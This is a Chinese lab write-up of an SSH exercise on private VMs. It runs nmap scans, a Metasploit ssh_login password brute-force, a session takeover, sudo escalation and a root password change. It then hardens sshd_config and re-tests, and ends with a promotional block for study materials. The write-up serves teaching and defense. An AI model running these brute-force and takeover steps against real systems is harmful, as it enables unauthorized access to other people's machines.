文章目录
- 一、实验
- 1.环境
- 2.nmap扫描目标主机
- 3.Kali Linux 进行 SSH 渗透
- 3.Kali Linux 进行 SSH 防御
- 二、问题
- 1.SSH有哪些安全配置
- 2.MSF 退出报错
一、实验
1.环境
(1)主机
表1 主机
| 系统 | 版本 | IP | 备注 |
| Kali Linux | 2022.4 | 192.168.204.154(动态) | |
| Ubuntu | 8.04 | 192.168.204.143 | Kali(2022.4)的目标主机 |
(2)查看Kali Linux (2022.4)系统版本
cat /etc/os-release(3) 查看Kali Linux (2022.4)系统IP地址
ip addr | grep 154(4)查看Ubuntu 8.04 系统版本及IP地址
lsb_release -aip addr2.nmap扫描目标主机
(1)扫描⽬标主机所在⽹段所有存活的主机
nmap -sP 192.168.204.0/24(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本
22端口已开放
nmap -sV 192.168.204.1433.Kali Linux 进行 SSH 渗透
(1)进入MSF 控制台
msfconsole(2) 搜索 ssh_login脚本
search ssh_login(3) 使⽤编号为 0 的脚本
use 0(4) 设置⽬标主机
set rhosts 192.168.204.143(4)查看选项
show options(5)设置用户名与密码本
set username msfadminset pass_file zidian.txt(6)运⾏脚本
run(7)查看会话
sessions(8)连接会话
sessions 1查看用户身份
whoami查看路径
pwd提升权限
sudo -i再次查看用户身份
whoami更改密码
password root(9)MobaXterm远程连接
连接
3.Kali Linux 进行 SSH 防御
(1)SSH安全配置(端口)
vim /etc/ssh/sshd_config修改端口
(2)重启
/etc/init.d/ssh restart(3)退出之前的MSF
(5)进入MSF 控制台
msfconsole(6) 搜索 ssh_login脚本
search ssh_login(6) 使⽤编号为 0 的脚本
use 0(7) 设置⽬标主机
set rhosts 192.168.204.143(8)设置用户名与密码本
set username msfadminset pass_file zidian.txt(9)运⾏脚本
失败
run(10)nmap扫描端口
ssh端口为12345
nmap -sV 192.168.204.143(11)查看选项
show options(12) 设置目标端口
set rport 12345(13)运⾏脚本
run(14)SSH安全配置(端口)
vim /etc/ssh/sshd_config修改登录验证时间
(15)重启
/etc/init.d/ssh restart(16)验证(等待1分钟)
(17)SSH安全配置(容错次数)
vim /etc/ssh/sshd_config修改容错次数
(18)重启
/etc/init.d/ssh restart(19)容错2次
二、问题
1.SSH有哪些安全配置
(1)配置
Port 12345 //端口 LoginGraceTime 1m //登录验证耗时 PermitRootLogin no //不允许root远程登录 MaxAuthTries 2 //最大容错次数2 AllowUsers msfadmin@192.168.204.100 //允许指定用户在指定IP上登录2.MSF 退出报错
(1)报错
[*] You have active sessions open, to exit anyway type "exit -y"(2)原因分析
有session会话正在运行。
(3)解决方法
exit -y网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取